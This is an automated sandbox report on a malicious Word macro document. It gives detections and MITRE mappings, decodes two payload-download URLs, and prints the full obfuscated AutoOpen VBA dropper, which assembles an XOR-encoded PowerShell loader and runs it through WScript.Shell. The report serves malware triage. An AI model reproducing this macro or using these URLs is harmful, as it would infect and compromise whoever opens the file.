MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes WScript.Shell and CreateObject to execute commands, specifically a PowerShell command. This indicates the document is designed to download and execute a second-stage payload.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6599348-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6599348-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828) PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828) PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ -
Payload URL decoded from an encoded PowerShell loader (2 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "ubwNPjYdFY" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://boyramos.dags.us/license/wait.exe Referenced by macro
- http://blackcontext.ru/wait.exeReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13091 bytes |
SHA-256: 5ca69548c32b8b749d84ec546ab4ac75da43e4dec7b836803ec508491f1a2af4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
267 of 429 identifiers look randomly generated (e.g. 'SmvtrzDDMXHY') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "pUiHXGEBpmEah"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ubwNPjYdFY"
Sub AutoOpen()
On Error Resume Next
TcNzJ = GBhuCQ + iFZKYB + 80113 + 69067 - 70918 * vKhHu
mhwYM = WczAzI + wDHjo + 84143 + 92188 - 82772 * noMLEQ
hojub = EFCfm + rALris + 8263 + 72681 - 90017 * iKItMf
CJKkqA = ilozF + CmTdG + 46750 + 37355 - 65106 * sqQNnG
wBKjSi = BLUaA + IRIfaI + 33052 + 10890 - 24850 * IzqwS
fYzVTY = FkMdA + VRBAcC + 27879 + 99929 - 63937 * wWLIt
MAuGI = YlLzzw + wtofz + 727 + 64489 - 29984 * nDaji
SmbrL = VtIKiw + nzYDtd + 73131 + 61357 - 12994 * iHNrKN
LiEFzTEwtU (FUKWbFUKjFn + bPzGdPS + tFmMoAKkBBO)
GMnEot = kWjZX + HuFvL + 28358 + 85586 - 27619 * wObwj
QCrAZ = nmKQz + wRsaBi + 97375 + 61615 - 46921 * SZNdWw
wIQiV = LSUOqH + pIbOC + 46760 + 77943 - 77042 * kzcill
hbjrA = LKVbX + pLMRK + 10161 + 45728 - 15069 * koZiMH
End Sub
Function FUKWbFUKjFn()
On Error Resume Next
CuECzc = (vzzJF - GrVVY - shqqMJ + Elczjt - 69367 + wTCis / tUSdD / iYwbkU)
WSWKop = (QiNEE - SifTA - mVYzQ + awtKZk - 97005 + sMkXBa / jlwYLH / JnKLi)
GhEWCD = 14686 - NnSjcV + 67567 * AlZfOo - XAjhwC + PBEOQ / ZiDtMO - GCblQM + 53409 / VqfiSn
AMzUF = (NsdGFc - OMGzI - ZKDjc + FcDmG - 98990 + GlpjO / SbNBF / qwFtKC)
BcJiIjN = "wershell " + " " + " " + " " + " &" + Chr(40) + " $p" + "ShomE[21]" + Chr(43) + "$PS" + "hOMe[30]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40)
KkMkh = 31548 / dipRwA + CWliu / ruclY + Ymjjd - 72613 + nbNcaX / jKJauu
YLqcN = 55075 / SQHaL + rzuuM / PNaotK + OfhkC - 81859 + AAbsHQ / WUKFC
KIMEst = 97842 / jTAOQ + GJYTm / dwMXMI + QfmBP - 28534 + ZJkPJ / tiJBSP
ZbOaHz = 77857 / Lvorj + itzRkz / wzZJJ + mwpKFw - 40983 + oQLtSa / NNvXa
zQfCb = " [stRin" + "g]::Joi" + "N" + Chr(40) + "''," + Chr(40) + " " + Chr(40) + " 22,91" + ", 12" + "3 , 10" + "2, 15 " + ",92,87" + " , 6" + "9 , 31 ," + "93, "
kEuUhN = 67158 / QrUPG + PThIw / JqHik + jCwEf - 12756 + MAPQzb / lTEPc
UwtRB = 32802 / nStwQ + PdfXLL / buFAD + hdlpms - 1987 + zmJfC / qAuGS
IojPO = 28137 / iEzXw + BOjlj / khPqY + nwWss - 30218 + rwDZvR / nbzvC
vpOvq = 67997 / zRhszL + bStmM / nEVwok + KSJiU - 77498 + GzhbC / ljZOK
NldvEaVQ = "80, 88 " + ",87 , " + "81,70, " + "18 ,1" + "24 ," + "87, " + "70,28" + ", 101,87" + " ,80 "
JjuKzB = 8522 / oQCii + zIGwFd / MlYpsv + uWlSYt - 6185 + jfzuBV / DRwwKT
TddTL = 94909 / VVEFLL + ikGok / ZaBLb + ciGst - 70970 + kCIoE / FjNJsp
NLsFw = 86235 / Prart + SjmBc / EPRSq + sIwXa - 99704 + hCWVlj / tplbXu
RkiDz = 34529 / OlwtB + EkFrQa / LLwNBV + MPdquv - 11916 + XTTahw / Racjw
PsYfhq = ",113 , 9" + "4,91 , " + "87 ,92" + ", 70 , " + "9 , 22" + ", 88 " + ", 95 ,1" + "02 , 1" + "5,21 ," + "90 , 70 ,"
EPZErf = BazrnT + kIUJKl + 99877 - iIckzz * OzaVz * avakJ * 98182 * juTaj + (59661 + asFSCb * jQbGh / 65496)
QwhhUF = ABlpDw + YbTwH + 7466 - GpabK * aHpZp * sWNjaB * 60723 * LInNj + (25856 + chNaE * cKIHGK / 90198)
tLMzc = oKrsv + nzzBNv + 93991 - zZczlz * MFcTq * IRwbND * 18483 * SpUfco + (59709 + GtLNA * TjNOd / 76252)
JRYhqJ = 51559 / ksbSsC + QPcLU / aQWvBG + nLRIWk - 98229 + KZCjK / AJjWLf
PLrjcVcp = "70,66 " + ", 8, 29," + "29 ,80" + ", 93 ," + " 75 ," + " 64,8" + "3, 9" + "5, 93" + " , 65" + " , 2" + "8 ,86"
ZjnGQ = viwYQF + HdCrlm + 13505 - PVaKd * jFIIh * FrDLK * 85751 * jVNiiG + (64940 + oZEBK * zKONvm / 18451)
uaVRzu = tsFpaW + rDjSC + 7971 - aMzWd * rLOBIi * lpvVq * 93787 * jKJdaU + (85705 + uNsOi * UOXvU / 14060)
idEhwR = BHOcFR + PCUvIu + 47422 - BIuzi * bXaWp * zhEviD * 31560 * nzQIN + (53605 + LCzLM * Rcwnw / 67044)
MARRUS = NtYBm + SopCES + 28449 - VuHTXG * iwdbQX * tBJLM * 47705 * zjQQn + (77368 + aZCPTA * GKzzLQ / 66776)
iENMN = ",83 , " + "85,65 ,28" + " ,71 ,6" + "5 ,29 " + ", 94, 91" + ",81,87," + " 92 , 65," + " 87 ,29 " + ",69, 83 ," + " 91,70, 2" + "8 ,87,7"
OfzXtK = aQwiG + zGYXKz + 28032 - jjjNr * lMQtI * NSESf * 50370 * srNRM + (16965 + QcoLH * aYhzQ / 18265)
hktSn = Jzids + mzdwfz + 27756 - CZRcXO * uulDo * sTdpFV * 69502 * GdudHF + (16784 + BGMzBO * TQuZF / 29429)
sZDIu = zGZciz + vXzQJK + 796 - iqrZdL * ZLwic * lUZzK * 55166 * ujkSCT + (23481 + RiQuOL * jMiRU / 78380)
dpQjl = PZqhs + arCqr + 8416 - BsfDGX * IhozOF * RsXNzU * 17026 * OiXIJ + (2256 + HXVrr * XzmKL / 86667)
iJsBLiSI = "4 , 87" + ",114 ," + " 90 , 70" + ", 70,66 ," + "8, 2" + "9,29 " + ",80 " + ",94,83, " + "81 , 89 ," + "81 ,93, 9" + "2,70 , 87"
DQNRz = wDokr + JWJozM + 95681 - qkPJAN * wWMqJC * XjjKd * 36192 * wFsMf + (63752 + mpicN * aTADRk / 63563)
VzvwCV = junEB + wDWjpm + 29092 - ajVUI * AiRoU * Andpff * 94987 * nJUKj + (19821 + TJczH * WuQab / 88395)
KAdzk = iJajB + pDcQM + 20319 - wIhZoo * qisNP * lsAnj * 39665 * bbztcb + (81626 + ztdDP * vwdbpL / 45323)
nSNzF = AlfBF + jzVRSO + 43456 - iHIYF * nfokFC * YOadO * 24430 * IakbiT + (44711 + EHPlt * XfJpt / 35828)
MnsGLCtzSiw = " , 7" + "4, 70" + ",28, " + "64,7" + "1,29" + " , 69" + ", 83" + " , 9" + "1,70 , 2"
HSDYiD = YRPKPi + IzRidz + 97247 - XwwJF * Uwciwm * chCoS * 59104 * acqwD + (52693 + znDmH * HvHaYw / 84089)
CdDYTX = szzqUN + DRFVz + 76248 - jRiSq * TfUCzD * DDkEmY * 14027 * szEMZ + (77135 + cmJvC * WLVGc / 66076)
NdzqQX = zhBiY + AnSdFR + 2028 - DisEA * hsOzJ * cJPBOv * 3197 * LulaW + (43213 + isrBL * XJvFlQ / 9162)
jcuihz = aHmjiY + fXzUfS + 18978 - iNvZkE * ctslWQ * wdziZM * 64723 * tiFjnd + (12747 + FOqwuj * IPurfs / 81682)
wiLfLSrk = "8 ,87 ,74" + " ,87 , 2" + "1, 2" + "8,97," + "66, 94," + "91,70,26" + ", 21 " + ",114,21" + ", 27 , 9" + ", 22 , "
TkKXdd = FPjqK + kpiWT + 36309 - jMahKQ * QaIWa * FTKUIb * 6792 * IuvRtJ + (34110 + PfGhzD * KdNME / 7962)
niqfiT = uYtuc + kOQAEO + 62577 - DwAtY * aXAWpW * kfkJOO * 88801 * zZZRt + (53316 + WdlfST * hpmJZf / 43109)
XEGzA = fqpzmP + WbbfR + 52057 - WlKDX * zvXEpO * aCVLvb * 32225 * mvfjEj + (21123 + KiHEU * luCZA / 71045)
UnfSr = jQPtLS + ZvFCFi + 95782 - IYspB * jZbPUn * FpLdM * 69283 * hYKbp + (94380 + ACYTTt * MOndpu / 98686)
XJjBKMA = "70, 116" + ",104,1" + "8 ,1" + "5, 18, 2" + "1, 7 ," + "11,1" + "0, 21,9" + " , 22"
wmGlTN = qGbGz + FObZsA + 84237 - CfzJO * QhRmaf * ijUJCN * 83674 * Hffts + (36292 + DJCoZO * HJcFOz / 17244)
SSdQKu = wOBDGD + LAajW + 44223 - izIAC * JkfSA * mnzlBr * 70970 * jwvCr + (62652 + SzvQj * KnTUPH / 71055)
MiiCJ = RMPZp + LkfDGJ + 42095 - qnkCUO * zjQmjz * XPNAhP * 95273 * hWavW + (50887 + POGlq * Ywfivp / 34024)
HNPiFQ = JOrPwY + iQQHG + 39161 - dPthC * ArvOw * dniBPE * 1475 * FROSB + (60538 + jNwFzj * izWwD / 8776)
RlwCKUtnpkd = " , 9" + "3 ,99 , 8" + "8 , 1" + "5, 22 " + ", 87" + " , 92"
FUKWbFUKjFn = BcJiIjN + zQfCb + NldvEaVQ + PsYfhq + PLrjcVcp + iENMN + iJsBLiSI + MnsGLCtzSiw + wiLfLSrk + XJjBKMA + RlwCKUtnpkd
ojRJXi = PpnAs + ARQVff + 57170 - jlFLm * LhzzrP * qzbiv * 11602 * tMBZWB + (12772 + LjiTff * uLwlC / 91484)
hKiIB = 63649 / NfXksn * (44971 + YCZWf - DXPvJ / uwQSi) - XEtlbJ - Zzopj
nZMwu = 46872 / SMinP * (24648 + IhOPEF - QSTma / AGGOh) - vWwhzW - HTKaGV
soIcbJ = 34371 / mkZjPX * (69408 + pkVTVN - YknmE / kKDBK) - MRtaw - Wwwtw
End Function
Function bPzGdPS()
On Error Resume Next
RNsjY = 70089 / uWGtMT * (15131 + MFPFh - VJzOt / wmFsM) - LzmOX - zHAzro
fsidH = 82086 / dzJWkr * (28277 + ZmjsoB - cQjUU / FCcfPl) - YooElw - OVdwUN
ivpKVW = 33220 / SwnWB * (46181 + hrVGTG - wcHsGw / mjzHJ) - GmVuOd - VrQPu
CmkHFK = 696 / zvEsUf * (49282 + HQOjwH - kwiZI / RWRLb) - YOfAhM - ODiVCK
mnsNvIVzbki = ",68, 8 " + ", 70, 87" + ",95 , " + "66 ," + " 25 ,21" + " ,110 ," + "21 ,25," + "22,70 ,1" + "16 , 104 "
RombO = 86888 / szMDdQ * (35314 + fMoOr - quVarq / PGMszj) - SzIkOh - JaSRwL
ESZHl = 32562 / JJaYzs * (22896 + aMrdXj - PQTkY / SzzppG) - PuwXc - nPALr
wMzVP = 71110 / WACInB * (85273 + qMdiKm - ijQTA / soPFb) - bSVbhE - jJMlI
qfcAC = 50600 / uQAWCi * (57124 + AKfhlq - EDAJOh / DJtfz) - bjruI - XiHOL
cAwwwb = ",25," + " 21,28 ," + " 87, 74" + ", 87,2" + "1,9, 84" + " ,93 ," + " 64,87" + " , 83 , 8" + "1 ,90 " + ", 26"
kKzDX = 54866 / PuiRFw * (70069 + dLnDM - QcVkv / JCsRuH) - QIvlrc - TjkEVk
QiWGi = 38351 / XkzTYY * (57470 + dEkpL - QnuQI / InHXl) - Hfwwt - XiqaK
YVOHh = 76974 / kIOzq * (52968 + WvZkcc - JRwJjL / ScNpdl) - mKBFTK - FsfGU
jGwZh = 92385 / ThbSb * (96375 + MCQWw - UMiZv / SzjrQO) - Kdwur - LswaT
hRBDj = ", 22 " + ",92, 1" + "22, 10" + "0 ,1" + "8, 91," + "92 , 18, " + "22 ," + " 88 ,9"
icJGw = 65081 / OEPzBc * (64409 + fAKNp - jkXfIR / DYSDLH) - pTGrvK - iuEEqd
KOVsEN = 96058 / bznwB * (35288 + YbtjwA - IUmfiO / mOAws) - MvvvQ - ujhOBv
fdDXm = 7536 / aGBGYj * (68408 + plmwJJ - cjwQQG / bFkkPi) - iqNuvi - upWhz
arVsiG = 96947 / lbpQtK * (60720 + tpVkdM - SRfTBp / bRozd) - wKjBwz - fBfRTC
TurLOSGzf = "5 , " + "102 " + ", 27" + " , 73," + "70,64 " + ",75,73," + " 22,91, " + "123,102" + ", 28,118" + ",93,69"
uvbDm = 11859 / AXYVnq * (52588 + vVoTAw - uZDOb / ircjRz) - fihwJ - nLSsHE
aifVfV = 11857 / Kkbhjr * (5204 + EtXUDN - EjJCP / JFUnF) - jinPH - LzjfBq
TijXH = 15468 / NTblWT * (81999 + BfGtbb - JRiQt / NbYhSA) - YchNfa - NCBsn
awTiN = 96652 / oABzX * (59789 + SjwlW - WzQnqK / Iuchw) - UGjXt - SkQic
fzjGt = ",92 " + ", 94" + " ,93 " + ", 83" + ", 86, 116" + ", 91, 9" + "4,87, 26 " + ",22,"
iwEZHP = 50232 / VPtqOn * (99922 + DDESuI - zsOAZ / GPlcJ) - PWzaC - wDNoXR
ZJoOjK = 24851 / RzvTn * (55282 + QOzMwA - BGjKFk / vFlwNS) - QwdKjD - nMwJi
aaSFkn = 92182 / hhVEc * (51728 + uJXZJ - zSUBN / YNuiAa) - KVmjL - WiiPH
CVzzoV = 79898 / ZGhtO * (1237 + OzHNEb - VEdBsw / KJUwO) - nHSzH - qpQSh
IfviwjK = "92,122, " + "100, 30" + " ,18 ,22 " + ",93,99,88" + ", 27,9," + " 97 ,70,8"
bPzGdPS = mnsNvIVzbki + cAwwwb + hRBDj + TurLOSGzf + fzjGt + IfviwjK
pjzkvQ = 74439 / pLikZP * (69134 + uJFmJQ - iZvrD / dhoVB) - QnqVm - SQJGkS
HcjsC = 51533 / UUaIwE * (43928 + XunzUd - QAIdL / naRCM) - GVpUrH - FojMn
jYuaGB = 35540 / OQLAY * (67110 + LitOX - TuDnSM / ALbocz) - ziGhU - wCWfVO
NEfMVu = (Ndrmo + bYDpWX) + MFdXM + 90006 * 78331 - RXYSEU / (55994 + fOSiwJ)
End Function
Function tFmMoAKkBBO()
On Error Resume Next
PUOpVU = (OrcsM + YAJKI) + bHEJOc + 46648 * 78106 - iLYmi / (32537 + zVidI)
rUtiH = (whIzpf + bIAbF) + wGSUj + 39226 * 97628 - XaEoaC / (68748 + DSQhTS)
MMMhpU = (DJFYW + iLLANw) + SjjEGi + 96640 * 40828 - ofiob / (90474 + whmDaB)
FzPni = (oURjdj + jHaHWt) + UZuiO + 75552 * 36984 - SatFR / (14015 + FruPdL)
Hcobkhv = "3 ,64 , 7" + "0, 31 " + ", 98, 64" + " ,93, 81," + " 87," + " 65, 65 " + ",18, 22,9" + "3, 9" + "9 , 88 " + ", 9," + " 80,64 "
ZMvLX = (DuzKW + EmRXK) + fpFlWS + 51341 * 33894 - CUJIE / (44010 + ApubA)
OwKuO = (oGfhh + EfFjYv) + ZCqnY + 30080 * 47867 - CjMGP / (83008 + LwYUY)
VKDYqm = (Fjnll + iBnpdl) + LAaqC + 33938 * 95170 - mbcili / (39034 + iwboGC)
jXWPo = (MARqu + VjMWYo) + THLCz + 13446 * 27187 - ErBwz / (17850 + uSfCJY)
SbowNOi = ", 87,83," + "89 ,9,79," + " 81,83," + "70 , " + "81,9" + "0, 73, " + "79 , 79 " + Chr(41)
QwzPaV = (zHuiQ + SuwwV) + WbjjT + 72290 * 80618 - UJPwLN / (46691 + SwfBTP)
bKrrw = (LVbDzj + LUUXIa) + HIQtu + 53817 * 78004 - urWfwt / (62322 + KIJPv)
jcziaN = (MLoFZ + jRddk) + EnswXC + 88866 * 49348 - BRTrGf / (99766 + WDPRO)
DJGoRM = (TBRcK + qjZfj) + dLtVNS + 53009 * 62802 - GaVZq / (82283 + mROdNa)
ajaNi = "| fOReA" + "cH{[" + "chAr] " + Chr(40) + " $" + "_-bxO" + "R 0x32 " + Chr(41) + " } " + Chr(41) + Chr(41) + " " + Chr(41) + " "
tFmMoAKkBBO = Hcobkhv + SbowNOi + ajaNi
CmwFF = (zZsnhm + pEKcF) + fpHfC + 64791 * 14437 - SszlIz / (8048 + KHPMX)
QBOwXJ = (zXick + KnsVpf) + NawDUR + 3825 * 87205 - QDaDd / (55360 + zWEXo)
iXQtQJ = (PptwQJ + vHuXz) + jhtCZm + 31356 * 34685 - CMtjlH / (68155 + IQwvC)
Fmrqk = (CNrObN + iNTit) + VmhFh + 46657 * 22315 - slGzB / (57147 + nPivfp)
End Function
Attribute VB_Name = "SmvtrzDDMXHY"
Function LiEFzTEwtU(OmvGcHQK)
On Error Resume Next
YuuoT = 385 / MwTdl + 76179 - WmnuRO / XtQtbY + havNR
znWkJp = 1168 / TRHtt + 97586 - DFcmcb / Advsb + fXXQUD
iQClcN = 41389 / cJAia + 79298 - UTboIw / spRONq + trYqXw
iBZIwZ = 46079 / SSHDY + 64935 - ZdpKi / kkfjZ + qsXEq
pRbQZC = 4182 / XuHMQ + 76938 - oCswvB / qXwPa + pBTSwG
lcXGr = 50335 / ASMBjr + 30826 - QivHpb / EUKbOY + apNJb
MilEU = 36518 / XLufj + 46273 - llWrRl / YDwPM + irWna
DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
aQkAo = 33525 / RoIwWQ + 74642 - qdkqWu / Sqhbb + wkbKsA
QJCOzm = 14367 / mLkmq + 72683 - tTbDcY / tTNpOV + jniQr
Iilwr = 73931 / MCsZi + 84520 - dkpTWr / wnbpoI + kfoHF
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.